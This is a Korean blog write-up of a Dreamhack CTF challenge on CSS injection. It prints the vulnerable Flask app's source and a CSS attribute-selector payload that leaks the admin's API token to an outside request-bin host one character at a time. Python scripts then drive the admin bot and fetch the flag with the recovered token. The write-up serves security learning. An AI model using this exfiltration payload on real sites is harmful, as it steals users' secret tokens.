본문 바로가기

Web Hacking/Dreamhack

[Dreamhack] CSS Injection write up

 

지금까지 푼 웹해킹 문제 중 가장 오래 걸렸다.. CSS Injection인 만큼, 사용자 입력 값이 CSS 값으로 들어가는 부분을 눈여겨 봐야한다. 코드가 긴 만큼 핵심 코드만 살펴볼 생각이다.

 

#!/usr/bin/python3
import hashlib, os, binascii, random, string
from flask import Flask, request, render_template, redirect, url_for, session, g, flash
from functools import wraps
import sqlite3
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from promise import Promise

app = Flask(__name__)
app.secret_key = os.urandom(32)

DATABASE = os.environ.get("DATABASE", "database.db")

try:
    FLAG = open("./flag.txt", "r").read().strip()
except:
    FLAG = "[**FLAG**]"

ADMIN_USERNAME = "administrator"
ADMIN_PASSWORD = binascii.hexlify(os.urandom(32))


def execute(query, data=()):
    con = sqlite3.connect(DATABASE)
    cur = con.cursor()
    cur.execute(query, data)
    con.commit()
    data = cur.fetchall()
    con.close()
    return data


def token_generate():
    while True:
        token = "".join(random.choice(string.ascii_lowercase) for _ in range(8))
        token_exists = execute(
            "SELECT * FROM users WHERE token = :token;", {"token": token}
        )
        if not token_exists:
            return token


def login_required(view):
    @wraps(view)
    def wrapped_view(**kwargs):
        if session and session["uid"]:
            return view(**kwargs)
        flash("login first !")
        return redirect(url_for("login"))

    return wrapped_view


def apikey_required(view):
    @wraps(view)
    def wrapped_view(**kwargs):
        apikey = request.headers.get("API-KEY", None)
        token = execute("SELECT * FROM users WHERE token = :token;", {"token": apikey})
        if token:
            request.uid = token[0][0]
            return view(**kwargs)
        return {"code": 401, "message": "Access Denined !"}

    return wrapped_view


@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, "_database", None)
    if db is not None:
        db.close()


@app.context_processor
def background_color():
    color = request.args.get("color", "white")
    return dict(color=color)


@app.route("/")
def index():
    return render_template("index.html")


@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "GET":
        return render_template("login.html")
    else:
        username = request.form.get("username")
        password = request.form.get("password")
        user = execute(
            "SELECT * FROM users WHERE username = :username and password = :password;",
            {
                "username": username,
                "password": hashlib.sha256(password.encode()).hexdigest(),
            },
        )

        if user:
            session["uid"] = user[0][0]
            session["username"] = user[0][1]
            return redirect(url_for("index"))

        flash("Wrong username or password !")
        return redirect(url_for("login"))


@app.route("/logout")
@login_required
def logout():
    session.clear()
    flash("Logout !")
    return redirect(url_for("index"))


@app.route("/register", methods=["GET", "POST"])
def register():
    if request.method == "GET":
        return render_template("register.html")
    else:
        username = request.form.get("username")
        password = request.form.get("password")

        user = execute(
            "SELECT * FROM users WHERE username = :username;", {"username": username}
        )
        if user:
            flash("Username already exists !")
            return redirect(url_for("register"))

        token = token_generate()
        sql = "INSERT INTO users(username, password, token) VALUES (:username, :password, :token);"
        execute(
            sql,
            {
                "username": username,
                "password": hashlib.sha256(password.encode()).hexdigest(),
                "token": token,
            },
        )
        flash("Register Success.")
        return redirect(url_for("login"))


@app.route("/mypage")
@login_required
def mypage():
    user = execute("SELECT * FROM users WHERE uid = :uid;", {"uid": session["uid"]})
    return render_template("mypage.html", user=user[0])


@app.route("/memo", methods=["GET", "POST"])
@login_required
def memopage():
    if request.method == "GET":
        memos = execute("SELECT * FROM memo WHERE uid = :uid;", {"uid": session["uid"]})
        return render_template("memo.html", memos=memos)
    else:
        memo = request.form.get("memo")
        sql = "INSERT INTO memo(uid, text) VALUES(:uid, :text);"
        execute(sql, {"uid": session["uid"], "text": memo})
    return redirect(url_for("memopage"))


# report
@app.route("/report", methods=["GET", "POST"])
def report():
    if request.method == "POST":
        path = request.form.get("path")
        if not path:
            flash("fail.")
            return redirect(url_for("report"))

        if path and path[0] == "/":
            path = path[1:]

        url = f"http://127.0.0.1:8000/{path}"
        if check_url(url):
            flash("success.")
        else:
            flash("fail.")
        return redirect(url_for("report"))

    elif request.method == "GET":
        return render_template("report.html")


def check_url(url):
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)

        driver_promise = Promise(driver.get("http://127.0.0.1:8000/login"))
        driver_promise.then(
            driver.find_element(By.NAME, "username").send_keys(str(ADMIN_USERNAME))
        )
        driver_promise.then(
            driver.find_element(By.NAME, "password").send_keys(ADMIN_PASSWORD.decode())
        )
        driver_promise = Promise(driver.find_element(By.ID, "submit").click())
        driver_promise.then(driver.get(url))

    except Exception as e:
        driver.quit()
        return False
    finally:
        driver.quit()
    return True


# API
@app.route("/api/me")
@apikey_required
def APIme():
    user = execute("SELECT * FROM users WHERE uid = :uid;", {"uid": request.uid})
    if user:
        return {"code": 200, "uid": user[0][0], "username": user[0][1]}
    return {"code": 500, "message": "Error !"}


@app.route("/api/memo")
@apikey_required
def APImemo():
    memos = execute("SELECT * FROM memo WHERE uid = :uid;", {"uid": request.uid})
    if memos:
        memo = []
        for tmp in memos:
            memo.append({"idx": tmp[0], "memo": tmp[2]})
        return {"code": 200, "memo": memo}

    return {"code": 500, "message": "Error !"}


# For Challenge
def init():
    execute("DROP TABLE IF EXISTS users;")
    execute(
        """
        CREATE TABLE users (
            uid INTEGER PRIMARY KEY,
            username TEXT NOT NULL UNIQUE,
            password TEXT NOT NULL,
            token TEXT NOT NULL UNIQUE
        );
    """
    )

    execute("DROP TABLE IF EXISTS memo;")
    execute(
        """
        CREATE TABLE memo (
            idx INTEGER PRIMARY KEY,
            uid INTEGER NOT NULL,
            text TEXT NOT NULL
        );
    """
    )

    # Add admin
    execute(
        "INSERT INTO users (username, password, token)"
        "VALUES (:username, :password, :token);",
        {
            "username": ADMIN_USERNAME,
            "password": hashlib.sha256(ADMIN_PASSWORD).hexdigest(),
            "token": token_generate(),
        },
    )

    adminUid = execute(
        "SELECT * FROM users WHERE username = :username;", {"username": ADMIN_USERNAME}
    )

    # Add FLAG
    execute(
        "INSERT INTO memo (uid, text)" "VALUES (:uid, :text);",
        {"uid": adminUid[0][0], "text": "FLAG is " + FLAG},
    )


with app.app_context():
    init()

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)

 

 

 

 

Add flag


 

flag가 생성되는 부분이다. init()함수를 통해 서버가 실행되면서 해당 코드가 실행된다. memo테이블에 adminUid와 flag를 저장하고 있다. 

 

 

 

/api/memo


 

apikey_required는 요청 헤더에서 API-KEY를 가져온다. 가져온 API-KEY의 값이 users테이블의 토큰과 일치할 경우 일치하는 토큰을 가져온다. 또한 요청 uid에 가져온 토큰에 해당하는 uid로 초기화 시킨다. (핵심) 그 후 해당 데코함수로 감싸진 함수가 실행된다.

 

즉, API-KEY에 해당하는 값이 토큰값과 일치할때만 APImemo가 실행된다.

 

 

APImemo는 요청 uid에 해당하는 메모테이블의 행을 반환한다. 이후 행의 0번째 인덱스와 2번째 인덱스를 반환한다. admin의 토큰일 경우 flag가 출력된다.

 

token_generate


 

토큰을 생성하는 부분이다. 영어 소문자 8자리의 토큰이 생성되어 DB에 저장된다. admin의 토큰도 마찬가지로 8자리이다.

 

 

 

/report


 

path의 값을 url에 넣어서 check_url에 보낸다. check_url은 admin으로 로그인하여 인자로 받은 url을 방문한다.

 

 

 

 

background_color


 

context_processor가 데코로 달려있다. 

 

해당 데코는 템플릿이 렌더링 되기전에 background_color가 리턴하는 것을 변수로 넣어서 렌더링한다. 따라서 color 값을 템플릿에 변수로 포함시켜 렌더링하게 된다.

 

 

모든 html파일에 color를 내가 지정할 수 있는 것 같다.

 

 

red로 잘 바뀐다. 이로써 모든 페이지에 사용자 입력값이 CSS의 템플릿 변수로 들어가게 된다.

 


 

flag를 얻기 위해선 크게 두 가지가 해결되어야 한다.

 

1. CSS Injection이 가능한 취약점

 

2. admin의 API Token

 

1번은 위에서 찾았기 때문에 2번만 고려하면 flag를 얻을 수 있다.

 

 

 

 

취약점 분석


CSS Injection이 가능한 취약한 부분을 찾았다. 이제 admin의 token을 탈취한다면 /api/memo에 해당 token으로 요청을 보내면 flag를 얻을 수 있다. 랜덤 생성된 토큰은 mypage에서 확인할 수 있었다.

 

 

임시로 만든 계정으로 mypage로 방문하니 API Token을 그대로 노출시켜준다. 만약 admin으로 로그인 된다면 admin의 mypage에도 역시 API Token이 그대로 노출될 것이다. CSS Injection을 이용해서 토큰을 얻어야한다.

 

 

mypage의 소스를 보면 input태그의 value값에 API Token값이 존재한다. CSS Injection으로 데이터를 탈취하기 위해서는 CSS의 특성 선택자를 이용해야한다.

 

만약 input[value^=s] { background: url(www.naver.com) }와 같이 CSS가 Injection된다면 input태그의 value값이 s로 시작한다면 배경색을 바꾸기 위해 naver.com으로 GET 요청이 전송될 것이다. 

 

내 api토큰을 이용해서 드림핵 request bin에 테스트했다.

 

http://host3.dreamhack.games:17000/mypage?color=white;}%20input[value^=s]%20{background:%20url(https://albonoe.request.dreamhack.games)}

 

👆 페이로드를 이용했다.

 

 

GET요청이 들어왔다. 이제 해당 취약점을 이용해 admin의 토큰을 알아내야 한다.

 

 

 

exploit


report 경로에서 admin에게 원하는 url을 방문하도록 할 수 있다. admin이 mypage를 방문하도록 하며, 방문할 때 토큰의 앞자리를 확인하는 페이로드를 같이 전송하여 request bin에 요청이 오는지 확인한다.

따라서 admin의 API Token의 값을 한 자리씩 알아낼 수 있다. 토큰의 길이는 총 8번이므로 적게는 8번의 페이로드 전송, 많게는 208번만 페이로드를 전송하면 된다. 하하

 

import requests

url = 'http://host3.dreamhack.games:19074/report'

data = {
    'path': 'mypage?color=gray;}%20input[value=(a~z)]%20{%20background:%20url(https://izqverh.request.dreamhack.games)'
}

result = requests.post(url, data=data)
print(1)

 

다음과 같이 파이썬 스크립트를 작성했다. 

 

 

이제 다음을 반복한다.

 

1. 위 빨간박스 표시된 value부분을 a부터 z까지 하나씩 넣고 요청을 보낸다.

 

2. request bin에 요청을 확인한다. (요청이 왔을 때의 문자 a라 가정)

 

3. a다음의 문자를 구하기 위해 a를 쓰고 1,2번을 반복한다. (8자리까지 반복) 

 

대략 100번정도 반복한 것 같다.

 

admin API Token: brpoouug

 

구한 admin의 API Token을 요청 헤더에 API-KEY로 세팅하여 /api/memo에 요청을 보낸다.

(/api/me에 요청을 보내면 토큰이 admin의 것이 정확한지 판별할 수 있다.)

 

import requests

url = 'http://host3.dreamhack.games:19074/api/memo'

headers = {
'API-KEY': 'brpoouug'
}

api_key = 'brpoouug'

result = requests.get(url, headers=headers)

print(result.text)